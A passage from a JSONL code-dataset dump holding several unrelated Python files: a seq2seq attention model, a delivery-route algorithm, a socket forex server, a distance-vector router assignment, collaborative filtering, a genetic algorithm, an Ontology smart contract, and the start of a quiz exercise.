hidden[-1,:,:]), dim=1)))\n #outputs = [len(sentence), batch_size, enc_hid_dim * 2]\n #hidden = [batch_size, dec_hid_dim]\n\n return outputs, hidden\n\nclass attention(nn.Module):\n def __init__(self, enc_hid_dim, dec_hid_dim):\n super().__init__()\n\n self.enc_hid_dim = enc_hid_dim\n self.dec_hid_dim = dec_hid_dim\n\n self.attn = nn.Linear((enc_hid_dim * 2) + dec_hid_dim, dec_hid_dim)\n self.v = nn.Parameter(torch.rand(dec_hid_dim))\n\n def forward(self, hidden, encoder_outputs, mask):\n #hidden = [batch_size, dec_hid_dim]\n #encoder_outputs = [len(src sentence), batch_size, enc_hid_dim * 2]\n #mask = [batch_size, len(src sentence)]\n\n batch_size = encoder_outputs.shape[1]\n src_len = encoder_outputs.shape[0]\n\n hidden = hidden.unsqueeze(1).repeat(1, src_len, 1)\n encoder_outputs = encoder_outputs.permute(1, 0, 2)\n\n #hidden = [batch_size, len(src sentence), dec_hid_dim]\n #encoder_outputs = [batch_size, len(src sentence), enc_hid_dim * 2]\n\n energy = torch.tanh(self.attn(torch.cat((hidden, encoder_outputs), dim=2)))\n energy = energy.permute(0, 2, 1)\n #energy = [batch_size, dec_hid_dim, len(src sentence)]\n #v = [dec_hid_dim]\n\n v = self.v.repeat(batch_size, 1).unsqueeze(1)\n #v = [batch_size, 1, dec_hid_dim]\n\n attention = torch.bmm(v, energy).squeeze(1)\n #attention = [batch_size, len(src sentence)]\n\n attention = attention.masked_fill(mask == 0, -1e10)\n\n return F.softmax(attention, dim=1)\n\nclass decoder(nn.Module):\n def __init__(self, output_dim, emb_dim, enc_hid_dim, dec_hid_dim, dropout, attention):\n super().__init__()\n\n self.emb_dim = emb_dim\n self.enc_hid_dim = enc_hid_dim\n self.dec_hid_dim = dec_hid_dim\n self.output_dim = output_dim\n self.dropout = dropout\n self.attention = attention\n \n self.embedding = nn.Embedding(output_dim, emb_dim)\n self.rnn = nn.GRU((enc_hid_dim * 2) + emb_dim, dec_hid_dim)\n self.out = nn.Linear((enc_hid_dim * 2) + dec_hid_dim + emb_dim, output_dim)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, input, hidden, encoder_outputs, mask):\n #input = [batch_size]\n #hidden = [batch_size, dec_hid_dim]\n #encoder_outputs = [len(src sentence), batch_size, enc_hid_dim * 2]\n #mask = [batch_size, len(src sentence)]\n\n input = input.unsqueeze(0)\n #input = [1, batch_size]\n\n embedded = self.dropout(self.embedding(input))\n #embedded = [1, batch_size, emb_dim]\n\n a = self.attention(hidden, encoder_outputs, mask)\n #a = [batch_size, len(src sentence)]\n\n a = a.unsqueeze(1)\n #a = [batch_size, 1, len(src sentence)]\n\n encoder_outputs = encoder_outputs.permute(1, 0, 2)\n #encoder_outputs = [batch_size, len(src sentence), enc_hid_dim * 2]\n\n weighted = torch.bmm(a, encoder_outputs)\n #weighted = [batch_size, 1, enc_hid_dim * 2]\n\n weighted = weighted.permute(1, 0, 2)\n #weighted = [1, batch_size, enc_hid_dim * 2]\n\n rnn_input = torch.cat((embedded, weighted), dim=2)\n #rnn_input = [1, batch_size, (enc_hid_dim * 2) + emb_dim]\n\n output, hidden = self.rnn(rnn_input, hidden.unsqueeze(0))\n #output = [len(sentence), batch_size, dec_hid_dim * n_directions]\n #hidden = [n_layers * n_directions, batch_size, dec_hid_dim]\n\n assert (output == hidden).all(), print(output.shape, hidden.shape, output[0,0,:25], hidden[0,0,:25])\n\n embedded = embedded.squeeze(0)\n output = output.squeeze(0)\n weighted = weighted.squeeze(0)\n output = self.out(torch.cat((output, weighted, embedded), dim=1))\n #output = [batch_size, output_dim]\n\n return output, hidden.squeeze(0), a.squeeze(1)\n\nclass seq2seq(nn.Module):\n def __init__(self, encoder, decoder,pad_idx, sos_idx, eos_idx, device):\n super().__init__()\n\n self.encoder = encoder\n self.decoder = decoder\n self.pad_idx = pad_idx\n self.sos_idx = sos_idx\n self.eos_idx = eos_idx\n self.device = device\n\n def create_mask(self, src):\n mask = (src != self.pad_idx).permute(1, 0)\n return mask\n\n def forward(self, src, src_len, trg, teacher_forcing_ratio = 0.5):\n #src = [len(src sentence), batch_size]\n #src_len = [batch_size]\n #trg = [len(trg sentence), batch_size]\n\n if trg is None:\n inference = True\n assert teacher_forcing_ratio == 0, \"Must be zero during inference\"\n trg = torch.zeros((100, src.shape[1]), dtype=torch.long).fill_(self.sos_idx).to(src.device)\n else:\n inference = False\n\n batch_size = src.shape[1]\n max_len = trg.shape[0]\n trg_vocab_size = self.decoder.output_dim\n\n outputs = torch.zeros(max_len, batch_size, trg_vocab_size).to(self.device)\n\n attentions = torch.zeros(max_len, batch_size, src.shape[0]).to(self.device)\n\n encoder_outputs, hidden = self.encoder(src, src_len)\n\n output = trg[0,:]\n mask = self.create_mask(src)\n #mask = [batch_size, len(src sentence)]\n\n for t in range(1, max_len):\n output, hidden, attention = self.decoder(output, hidden, encoder_outputs, mask)\n outputs[t] = output\n attentions[t] = attention\n teacher_force = random.random() < teacher_forcing_ratio\n top1 = output.max(1)[1]\n output = (trg[t] if teacher_force else top1)\n if inference and output.item() == self.eos_idx:\n return outputs[:t], attentions[:t]\n \n return outputs, attentions","sub_path":"seq2seq_attGRU.py","file_name":"seq2seq_attGRU.py","file_ext":"py","file_size_in_byte":7344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200732243","text":"# vars to store sorted delivery trucks\n\nfirst_deliv_sorted = []\nfirst_deliv_sorted_idx = []\n\nsecond_deliv_sorted = []\nsecond_deliv_sorted_idx = []\n\nthird_deliv_sorted = []\nthird_deliv_sorted_idx = []\n\n# gets called in calc_dist module\n# calls find_min_dist to find mininum travel distance for a delivery truck\ndef fastest_route(delivery_list, delivery_num, current_loc, csv_address_data):\n if (len(delivery_list) == 0):\n return delivery_list\n else:\n try:\n min_dist = 20.0\n new_loc = 0\n curr_dist = 0\n find_min_dist(delivery_list,\n delivery_num,\n current_loc,\n csv_address_data,\n min_dist,\n new_loc,\n curr_dist)\n except IndexError:\n pass\n\n# greedy algorithm O(N)\n# 2 loops each takeing O(n) thus O(2N) = O(N)\n\n# first loop gets back the distance between two packages\n# and compares with the min_dist which is initally set to 20\n# and that address location is then stored in new_loc\n# second loop again loops through deliver_list\n# and calls sort_delivery() to add the new package info to\n# a sorted list and stores its index, and pops the minimum\n# distance from the original deliver_list\n# updates the current location\n# and calls the parent func fastest_route again recurssively\n\n\ndef find_min_dist(delivery_list,\n delivery_num,\n current_loc,\n csv_address_data,\n min_dist,\n new_loc,\n curr_dist):\n for i in range(len(delivery_list)): # O(N)\n temp = find_current_dist_val(current_loc,\n delivery_list[i].address_location,\n csv_address_data)\n if temp <= min_dist:\n min_dist = temp\n new_loc = delivery_list[i].address_location\n for i in range(len(delivery_list)): # O(N)\n temp = find_current_dist_val(current_loc,\n delivery_list[i].address_location,\n csv_address_data)\n if (temp == min_dist):\n if (delivery_num == \"first\"):\n sort_delivery(delivery_list, i, current_loc, new_loc, csv_address_data,\n first_deliv_sorted, first_deliv_sorted_idx, \"first\")\n elif (delivery_num == \"second\"):\n sort_delivery(delivery_list, i, current_loc, new_loc, csv_address_data,\n second_deliv_sorted, second_deliv_sorted_idx, \"second\")\n elif (delivery_num == \"third\"):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n sort_delivery(delivery_list, i, current_loc, new_loc, csv_address_data,\n third_deliv_sorted, third_deliv_sorted_idx, \"third\")\n\ndef sort_delivery(delivery_list, i, current_loc, new_loc, csv_address_data,\n sorted_list, sorted_list_idx, msg):\n sorted_list.append(delivery_list[i])\n sorted_list_idx.append(delivery_list[i].address_location)\n delivery_list.pop(delivery_list.index(delivery_list[i]))\n current_loc = new_loc\n fastest_route(delivery_list, msg, current_loc, csv_address_data)\n\n# finds distance value by getting data from csv_address_data\ndef find_current_dist_val(row, col, csv_address_data):\n curr_dist = csv_address_data[row][col]\n if curr_dist == '':\n curr_dist = csv_address_data[col][row]\n return float(curr_dist)","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"462425473","text":"import socket\nimport json\nfrom threading import Thread\nfrom logger import is_logged, is_sign_up\nfrom tkinter import *\nfrom get_data_web import setData\nPORT = 5455\nHOST = \"0.0.0.0\"\n# ThreadCount = 0 \n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((HOST, PORT))\n# ==================GUI-SERVER-MAIN=============\nwindow = Tk()\nwindow.geometry(\"350x400\")\nwindow.title(\"Forex Rate\")\nicon = PhotoImage(file='1855847.png')\nwindow.iconphoto(True, icon)\n# ====logo=====\nframe_logo_root = Frame(window, bg = \"white\", bd = 5)\nframe_logo_root.place(x = 0, y = 0, height = 150, width = 250)\nlogo_root = Label(frame_logo_root, text = \"FOREX RATE\", font =(\"Impact\", 30, \"bold\"), fg = \"#D2691E\")\nlogo_root.place(x = 15, y = 10)\n# ====scroll-bar====\nscroll_bar = Scrollbar(window)\nscroll_bar.pack(side = RIGHT, fill = Y )\n# ====status-main===\nstatus = Listbox(window, width = 32, height = 15, yscrollcommand = scroll_bar.set)\nstatus.place(x = 25, y = 70)\nstatus.insert(END, \"Waiting for client...\")\n# ====scroll-bar-command====\nscroll_bar.config(command = status.yview)\n\n\ndef Handle_client(conn, addr):\n # log\n while True:\n while True:\n client_select = conn.recv(1024).decode(\"utf-8\")\n user_json = conn.recv(1024).decode(\"utf-8\")\n user = json.loads(user_json)\n is_success = False\n if client_select == \"login\":\n # login\n if is_logged(user):\n print(\"{} logged!\".format(user[\"name\"]))\n status.insert(END,\"{} logged!\".format(user[\"name\"]))\n conn.sendall(\"login_success\".encode(\"utf-8\"))\n is_success = True\n else:\n conn.sendall(\"login_fail\".encode(\"utf-8\"))\n elif client_select == \"sign_up\":\n # regis\n if is_sign_up(user):\n print(\"{} signed up!\".format(user[\"name\"]))\n status.insert(END,\"{} signed up!\".format(user[\"name\"]))\n conn.sendall(\"sign_up_success\".encode(\"utf-8\"))\n else:\n conn.sendall(\"sign_up_fail\".encode(\"utf-8\"))\n if is_success == True:\n break\n \n clients[user[\"name\"]] = conn\n # run\n while True:\n data_client_json = clients[user[\"name\"]].recv(1024).decode(\"utf-8\")\n data_client = json.loads(data_client_json)\n if data_client[\"msg\"] == \"quit\":\n status.insert(END, \"{} logged out\".format(data_client[\"name\"]))\n break\n # response\n if data_client[\"msg\"] == \"GET\": \n print(\"{} request {}\".format(data_client[\"name\"], data_client[\"msg\"]))\n status.insert(END, \"{} request {}\".format(data_client[\"name\"], data_client[\"msg\"]))\n # do something\n # sendall setData\n clients[user[\"name\"]].sendall(json.dumps(setData).encode(\"utf-8\"))\n # if data_server == \"quit\":\n # conn.close()\n\n\ndef Accept_connection():\n while True:\n conn, addr = server.accept()\n print(f\"connected by {addr}\")\n status.insert(END,f\"connected by {addr}\")\n # clients.append(conn)\n # start_new_thread(handle_client, (conn,addr))\n # ThreadCount += 1\n conn.sendall(f\"Server: Welcome {addr}\".encode(\"utf-8\"))\n Thread(target=Handle_client, args=(conn, addr)).start()\n\n\nif __name__ == \"__main__\":\n # ...the same as hash table\n clients = {}\n server.listen(6)\n ACCEPT_THREAD = Thread(target=Accept_connection)\n ACCEPT_THREAD.start()\n # window.protocol(\"WM_DELETE_WINDOW\", on_closing)\n window.mainloop()\n ACCEPT_THREAD.join()\n server.close()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"563500597","text":"# --------------------------------------------------------------------------- #\n# ---------------------- Engenharia de Sistemas - UFMG ---------------------- #\n# ----------------------- DCC023 - Redes de Computadores -------------------- #\n# --------------------- Prof. Ítalo Fernando Scota Cunha -------------------- #\n# ------------------------ Trabalho Prático II - DCCRIP --------------------- #\n# ----------- Alunos : Humberto Monteiro Fialho (2013430811) ------------ #\n# -------------------- Rafael Carneiro de Castro (2013030210) ------------ #\n# --------------------------------------------------------------------------- #\n\nimport sys\nimport json\nimport copy\nimport threading\nimport socket as sck\nfrom random import randint\n\nMAX_PAYLOAD_SIZE = 65536\nMAX_HISTORY_VERSION = 10000\n\n\n# method to call function every 'secs' seconds\ndef set_interval(func, secs):\n def function_wrapper():\n func()\n set_interval(func, secs)\n t = threading.Timer(secs, function_wrapper)\n t.start()\n return t\n\n\nclass Router:\n neighbors = []\n routing = []\n history = []\n\n def __init__(self, ip, period):\n self.ip = ip\n self.port = 55151\n self.period = period\n this_routing = dict()\n this_routing['ip'] = ip\n this_routing['distance'] = 0\n this_routing['next'] = ip\n this_routing['ttl'] = 4\n self.history.append(this_routing)\n self.history_version = 0\n self.routing_version = 0\n self.routing = dict()\n self.update_routing_table()\n\n def add_neighbor(self, neighbor_ip, neighbor_weight):\n new_neighbor = dict()\n new_neighbor['ip'] = neighbor_ip\n new_neighbor['weight'] = int(neighbor_weight)\n self.neighbors.append(new_neighbor)\n new_route = dict()\n new_route['ip'] = new_neighbor['ip']\n new_route['distance'] = new_neighbor['weight']\n new_route['next'] = new_neighbor['ip']\n new_route['ttl'] = 4\n self.history.append(new_route)\n self.history_version = self.history_version + 1\n\n def remove_neighbor(self, neighbor_ip):\n to_remove = list(filter(lambda neighbor: neighbor['ip'] == neighbor_ip, self.neighbors))\n if len(to_remove) > 0:\n learned_from_neighbor = list(filter(lambda option: option['next'] == neighbor_ip, self.history))\n\n # remove routes learned from that neighbor\n if len(learned_from_neighbor) > 0:\n for route in learned_from_neighbor:\n self.history.remove(route)\n\n # update history version\n self.history_version = self.history_version + 1\n\n # remove neighbor\n self.neighbors.remove(to_remove[0])\n\n def send_update(self):\n routing_table = self.get_routing_table()\n\n update_message = dict()\n update_message['type'] = 'update'\n update_message['source'] = self.ip\n update_message['destination'] = ''\n update_message['distances'] = dict()\n\n for ip in routing_table.keys():\n update_message['distances'][ip] = routing_table[ip][0]['distance']\n\n connection = sck.socket(sck.AF_INET, sck.SOCK_DGRAM)\n for neighbor in self.neighbors:\n # copy message to use original in other neighbor messages\n copy_message = copy.deepcopy(update_message)\n copy_message['destination'] = neighbor['ip']\n\n # by split horizon, remove route to destination of message\n if neighbor['ip'] in copy_message['distances'].keys():\n del copy_message['distances'][neighbor['ip']]\n\n # by split horizon, remove route learned from destination of message\n to_remove = []\n for ip in routing_table.keys():\n learned_from_destination = list(filter(lambda option: option['next'] == neighbor['ip'],\n routing_table[ip]))\n if len(learned_from_destination) > 0 and ip in copy_message['distances'].keys():\n to_remove.append(ip)\n for ip in to_remove:\n copy_message['distances'].pop(ip)\n\n # all routers have the same port\n connection.sendto(json.dumps(copy_message).encode(), (neighbor['ip'], self.port))\n\n def get_routing_table(self):\n # updating routing on-demand\n if self.routing_version < self.history_version:\n # update old routing table\n self.update_routing_table()\n return self.routing\n\n def update_routing_table(self):\n # get the best options of routes for each IP\n # each one can have more than one route with the same distance (load balancing)\n routes_by_ip = dict()\n for history in self.history:\n ip_key = history['ip']\n if ip_key not in routes_by_ip.keys() or routes_by_ip[ip_key][0]['distance'] > history['distance']:\n # if there isn't a route for that IP on the routing table,\n # or the new history has a better distance, update de routing entry\n routes_by_ip[ip_key] = [history]\n elif routes_by_ip[ip_key][0]['distance'] == history['distance']:\n # if already exists a route for that IP with that distance, add new option\n routes_by_ip[ip_key].append(history)\n\n self.routing_version = self.history_version\n self.routing = routes_by_ip\n\n def subtract_ttl(self, source_ip):\n to_remove = []\n # subtract TTL from routes learned from source\n for route in self.history:\n if route['next'] == source_ip:\n route['ttl'] = route['ttl'] - 1\n if route['ttl'] == 0:\n to_remove.append(route)\n\n # remove routes with TTL equals to 0\n for zero_ttl in to_remove:\n self.history.remove(zero_ttl)\n\n def receive_table_info(self, table_info):\n # find neighbor who sent that information\n source = list(filter(lambda neighbor: neighbor['ip'] == table_info['source'], self.neighbors))\n if len(source) == 0 or table_info['destination'] != self.ip:\n # leave if it's from unknown source or another destination\n return\n source = source[0]\n\n self.subtract_ttl(source['ip'])\n\n for ip in table_info['distances'].keys():\n # update the history with the route for that IP by that source\n on_history = list(filter(lambda route: route['ip'] == ip and route['next'] == table_info['source'],\n self.history))\n # there should only exists one history for that IP by that source\n if len(on_history) > 0:\n # there is a history for that IP by that source, just update distance and TTL\n on_history[0]['distance'] = table_info['distances'][ip] + source['weight']\n on_history[0]['ttl'] = 4\n else:\n # there isn't a history for that IP by that source, add new\n new_history = dict()\n new_history['ip'] = ip\n new_history['distance'] = table_info['distances'][ip] + source['weight']\n new_history['next'] = table_info['source']\n new_history['ttl'] = 4\n self.history.append(new_history)\n\n # adding history version to update routing on-demand\n self.history_version = self.history_version + 1\n if self.history_version > MAX_HISTORY_VERSION:\n self.history_version = 0\n self.update_routing_table()\n\n def receive_trace(self, message):\n # first of all, add this IP to hops\n message['hops'].append(self.ip)\n\n if message['destination'] != self.ip:\n # this isn't the final destination, send to next hop with load balance\n self.send_message(message)\n else:\n # this is the final destination, respond with the trace result\n self.send_data(message['source'], json.dumps(message))\n\n def receive_data(self, message):\n if message['destination'] == self.ip:\n # print payload if the destination is that router\n print(message['payload'])\n else:\n # send to next hop with load balance\n self.send_message(message)\n\n def send_trace(self, final_ip):\n trace_message = dict()\n trace_message['type'] = 'trace'\n trace_message['source'] = self.ip\n trace_message['destination'] = final_ip\n trace_message['hops'] = [self.ip]\n\n # send message with load balance\n self.send_message(trace_message)\n\n def send_data(self, destination, payload):\n data_message = dict()\n data_message['type'] = 'data'\n data_message['source'] = self.ip\n data_message['destination'] = destination\n data_message['payload'] = payload\n\n # send message with load balance\n self.send_message(data_message)\n\n def send_message(self, message):\n routing_table = self.get_routing_table()\n\n if message['destination'] in routing_table.keys():\n # select one of the best options for load balancing\n options = routing_table[message['destination']]\n selected_option = randint(0, len(options) - 1)\n selected_hop = options[selected_option]['next']\n\n connection = sck.socket(sck.AF_INET, sck.SOCK_DGRAM)\n # all routers have the same port\n connection.sendto(json.dumps(message).encode(), (selected_hop, self.port))\n\n\nrouter = None\n\n\ndef star_router(address, update_period, startup_commands):\n global router\n router = Router(address, update_period)\n\n socket = sck.socket(sck.AF_INET, sck.SOCK_DGRAM)\n socket.setsockopt(sck.SOL_SOCKET, sck.SO_REUSEADDR, 1)\n socket.bind((router.ip, router.port))\n\n # read commands from file\n if startup_commands:\n read_command_file(startup_commands)\n\n # read commands from terminal\n read_thread = threading.Thread(target=read_commands, args=())\n read_thread.start()\n\n # receive data from routers\n read_thread = threading.Thread(target=receive_data, args=(socket,))\n read_thread.start()\n\n # send update message to neighbors\n set_interval(router.send_update, router.period)\n\n\ndef read_command_file(file_name):\n with open(file_name, 'r') as file:\n line = file.readline()\n while line:\n if line is not '\\n':\n read_command(line)\n line = file.readline()\n\n\ndef read_commands():\n while True:\n read = input()\n read_command(read)\n\n\ndef read_command(read_line):\n global router\n\n read_line = read_line.split()\n if read_line[0] == 'add':\n router.add_neighbor(read_line[1], read_line[2])\n elif read_line[0] == 'del':\n router.remove_neighbor(read_line[1])\n elif read_line[0] == 'trace':\n router.send_trace(read_line[1])\n\n\ndef receive_data(connection):\n global router\n\n while True:\n data = json.loads(connection.recv(MAX_PAYLOAD_SIZE))\n\n if data['type'] == 'update':\n router.receive_table_info(data)\n elif data['type'] == 'trace':\n router.receive_trace(data)\n elif data['type'] == 'data':\n router.receive_data(data)\n\n\n# main: calling functions to receive inputs\ndef main():\n address = None\n update_period = None\n startup_commands = None\n\n if len(sys.argv) < 5:\n address = sys.argv[1]\n update_period = sys.argv[2]\n if len(sys.argv) > 3:\n startup_commands = sys.argv[3]\n else:\n if '--addr' in sys.argv:\n address = sys.argv[sys.argv.index('--addr') + 1]\n if '--update-period' in sys.argv:\n update_period = sys.argv[sys.argv.index('--update-period') + 1]\n if '--startup-commands' in sys.argv:\n startup_commands = sys.argv[sys.argv.index('--startup-commands') + 1]\n\n star_router(address, int(update_period), startup_commands)\n\n return\n\n\n# --------------------------------------------------------------------------- #\n# calling main function\nif __name__ == '__main__':\n main()\n","sub_path":"tp2/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":12205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"119794004","text":"import pandas as pd\nimport xlrd\nimport math\nimport csv\n\nclass colaborative_filtering():\n def colab_filtering(self): \n \"\"\"\n - Function Is used to calculate missing values for recommendation \n in a particular users data\n - Missing values hare here denoted by rating 99\n - First Data file alonge with similarity matrix(computed earlier)\n file is opened.\n - For all users who are similar to the ith user i.e similarity(i,j)>0\n are taken into considerationto calculate the missing rating of a user.\n \"\"\" \n path = './dataset/'\n filename = 'similarity5000.csv'\n with open(path+filename, 'r') as f:\n reader = csv.reader(f)\n your_list = list(reader)\n\n sim = []\n for i in range(len(your_list)):\n sim.append([])\n for j in range(len(your_list[i])):\n if your_list[i][j]=='':\n pass\n else:\n sim[i].append(float(your_list[i][j]))\n\n filename2 = '5000dataset3.xlsx'\n\n xlsfile = xlrd.open_workbook(path+filename2, on_demand= True)\n xlsfiledata = xlsfile.sheet_by_index(0)\n\n data=[]\n for i in range(0,100):\n data.append([])\n for j in range(0,5000):\n data[i].append(xlsfiledata.cell(i,j).value)\n\n #print(data[0])\n\n colab_fil = []\n for i in range(0,100):\n colab_fil.append([])\n print(i)\n for j in range(0,5000):\n if data[i][j]==99:\n sum1=0\n sum2=0\n for k in range(0,100):\n if k==i:\n pass\n else:\n if i0 and data[k][j]!=99:\n sum1 = sum1 + (float(data[k][j])*float(sim[i][k-i]))\n sum2 = sum2 + float(sim[i][k-i])\n elif i>k and sim[i-k][k]>0 and data[k][j]!=99:\n sum1 = sum1 + (float(data[k][j])*float(sim[i-k][k]))\n sum2 = sum2 + float(sim[i-k][k])\n\n value = (sum1/sum2) if sum2!=0 else 0\n colab_fil[i].append(value)\n #data[i][j]=value\n else:\n colab_fil[i].append(data[i][j])\n\n my_df = pd.DataFrame(colab_fil)\n my_df.to_csv(path+'colab5000.csv',index=False,header=False)\n\nif __name__=='__main__':\n cf = colaborative_filtering()\n cf.colab_filtering()\n","sub_path":"colab_filtering.py","file_name":"colab_filtering.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448971422","text":"__author__ = 'ARturo'\n## TUTORIAL from http://lethain.com/genetic-algorithms-cool-name-damn-simple/\n# genetic algorithm to find combinations of 5 numbers which sum 200\n\nfrom random import randint\ndef individual(length, min, max):\n 'Create a memeber of the population'\n return [randint(min, max) for x in xrange(length)]\n\ndef population(count, length, min, max):\n \"\"\"\n Create a number of individuals ( i.e. a population)\n :param count: size of population\n :param length: size of each individual\n :param min: minimum for each of the values in the individual's list\n :param max: maximum for each of the values in the individual's list\n :return: a list of individuals\n \"\"\"\n\n return [individual(length, min, max) for x in xrange(count)]\n\nfrom operator import add\n\ndef fitness(individual, target):\n \"\"\"\n Define how good a individual is. The lower, the better.\n\n :param individual: individual we are evaluating\n :param target: the sum we are aiming\n :return: distance to target\n \"\"\"\n\n sum = reduce(add, individual, 0)\n return abs(target-sum)\n\ndef grade(pop, target):\n 'Avarage fitness for a population'\n summed = reduce(add, (fitness(x, target) for x in pop), 0)\n return summed/ (len(pop) * 1.0)\n\nfrom random import random\n\ndef evolve(pop, target, retain = 0.2, random_select = 0.05, mutate = 0.01):\n graded = [(fitness(x, target), x) for x in pop] # return individuals with the fitness\n graded = [x[1] for x in sorted(graded)] # return only individuals ordered by fitness\n retain_length = int(len(pop) * retain)\n parents = graded[: retain_length] #the parents are the 20percent better\n\n #randomly add other individuals to promote genetic diveristy\n for individual in graded[retain_length:]:\n if random_select > random():\n parents.append(individual)\n\n #mutate some individuals\n for individual in parents:\n if mutate > random():\n pos_to_mutate = randint(0, len(individual)-1)\n # this mutation is not ideal, because it\n # restricts the range of possible values,\n # but the function is unaware of the min/max\n # values used to create the individuals,\n individual[pos_to_mutate] = randint(\n min(individual), max(individual))\n\n # crossover parents to create children\n parents_length = len(parents)\n desired_length = len(pop) - parents_length\n children = []\n while len(children) < desired_length:\n male = randint(0, parents_length-1)\n female = randint(0, parents_length-1)\n if male != female:\n male = parents[male]\n female = parents[female]\n half = len(male) / 2\n child = male[:half] + female[half:]\n children.append(child)\n\n parents.extend(children)\n return parents\n","sub_path":"PythonicGenericAlgorithm/genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"540927601","text":"OntCversion = '2.0.0'\nfrom ontology.interop.Ontology.Contract import Migrate\nfrom ontology.interop.System.Storage import GetContext, Get, Put\nfrom ontology.interop.System.Runtime import CheckWitness, GetTime, Notify\nfrom ontology.interop.System.ExecutionEngine import GetExecutingScriptHash\nfrom ontology.interop.Ontology.Native import Invoke\nfrom ontology.interop.Ontology.Runtime import Base58ToAddress\nfrom ontology.builtins import concat, state\n\nfrom ontology.libont import AddressFromVmCode\n\n\"\"\"\nhttps://github.com/ONT-Avocados/python-template/blob/master/libs/Utils.py\n\"\"\"\ndef Revert():\n \"\"\"\n Revert the transaction. The opcodes of this function is `09f7f6f5f4f3f2f1f000f0`,\n but it will be changed to `ffffffffffffffffffffff` since opcode THROW doesn't\n work, so, revert by calling unused opcode.\n \"\"\"\n raise Exception(0xF1F1F2F2F3F3F4F4)\n\n\n\"\"\"\nhttps://github.com/ONT-Avocados/python-template/blob/master/libs/SafeCheck.py\n\"\"\"\ndef Require(condition):\n \"\"\"\n\tIf condition is not satisfied, return false\n\t:param condition: required condition\n\t:return: True or false\n\t\"\"\"\n if not condition:\n Revert()\n return True\n\ndef RequireScriptHash(key):\n \"\"\"\n Checks the bytearray parameter is script hash or not. Script Hash\n length should be equal to 20.\n :param key: bytearray parameter to check script hash format.\n :return: True if script hash or revert the transaction.\n \"\"\"\n Require(len(key) == 20)\n return True\n\ndef RequireWitness(witness):\n \"\"\"\n\tChecks the transaction sender is equal to the witness. If not\n\tsatisfying, revert the transaction.\n\t:param witness: required transaction sender\n\t:return: True if transaction sender or revert the transaction.\n\t\"\"\"\n Require(CheckWitness(witness))\n return True\n\n\nONGAddress = bytearray(b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02')\nContractAddress = GetExecutingScriptHash()\nAdmin = Base58ToAddress(\"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\")\n\nTOTAL_ONG_KEY = \"TotalONG\"\n\ndef Main(operation, args):\n if operation == \"deposit\":\n if len(args) != 2:\n return False\n account = args[0]\n ongAmount = args[1]\n return deposit(account, ongAmount)\n\n if operation == \"getTotalOng\":\n return getTotalOng()\n if operation == \"getDepositAmount\":\n if len(args) != 1:\n return False\n account = args[0]\n return getDepositAmount(account)\n\n if operation == \"migrateContract\":\n if len(args) != 7:\n return False\n code = args[0]\n needStorage = args[1]\n name = args[2]\n version = args[3]\n author = args[4]\n email = args[5]\n description = args[6]\n return migrateContract(code, needStorage, name, version, author, email, description)\n return False\n\n\n\ndef deposit(account, ongAmount):\n RequireWitness(account)\n Require(_transferONG(account, ContractAddress, ongAmount))\n\n Put(GetContext(), concat(\"D_ONG\", account), getDepositAmount(account) + ongAmount)\n Put(GetContext(), TOTAL_ONG_KEY, getTotalOng() + ongAmount)\n Notify([\"deposit\", account, ongAmount])\n return True\n\ndef getDepositAmount(account):\n return Get(GetContext(), concat(\"D_ONG\", account))\n\ndef getTotalOng():\n return Get(GetContext(), TOTAL_ONG_KEY)\n\ndef migrateContract(code, needStorage, name, version, author, email, description):\n RequireWitness(Admin)\n # == Please Make sure transfer all the asset within the old contract to the new Contract\n # == If you do not transfer the assets including ONG, ONT, or OEP4 out,\n # == that means these assets will be out of your control for good.\n newReversedContractHash = AddressFromVmCode(code)\n res = _transferONGFromContact(newReversedContractHash, getTotalOng())\n Require(res)\n if res == True:\n res = Migrate(code, needStorage, name, version, author, email, description)\n Require(res)\n Notify([\"Migrate Contract successfully\", Admin, GetTime()])\n return True\n else:\n Notify([\"MigrateContractError\", \"transfer ONG to new contract error\"])\n return False\n\n\ndef _transferONG(fromAcct, toAcct, amount):\n \"\"\"\n transfer ONG\n :param fromacct:\n :param toacct:\n :param amount:\n :return:\n \"\"\"\n RequireWitness(fromAcct)\n param = state(fromAcct, toAcct, amount)\n res = Invoke(0, ONGAddress, 'transfer', [param])\n if res and res == b'\\x01':\n return True\n else:\n return False\n\ndef _transferONGFromContact(toAcct, amount):\n param = state(ContractAddress, toAcct, amount)\n res = Invoke(0, ONGAddress, 'transfer', [param])\n if res and res == b'\\x01':\n return True\n else:\n return False","sub_path":"CheckBeforeMigrate/mustSeeBeforeMigrate.py","file_name":"mustSeeBeforeMigrate.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"401869167","text":"# Write a 'quiz' program that asks the user a random series of movie quote questions from a dictionary. The 'key' should be the question (a string), and the 'value' should be the answer to the question (also a string). \n\n# Requirements\n\n# Prompt the user for how many quiz questions and ask only that amount.\n# There should be 10 total possible trivia questions -- you can start with the example ones and add 5 of your own.\n# Randomly choose each question from the dictionary without duplicates (see below).\n# If the user enters the wrong answer, the program should output the correct answer.\n# Keep a score of how many questions were correct and output the score at the end.\n# Number each question in the output (\"Question #1:, Question #2:\"), etc.\n# The answer should be case insensitive -- if the user answers tiTaNiC for Titanic and it should be correct.\n# The program should run once and exit.\n\nimport random\n\ndef main():\n questions 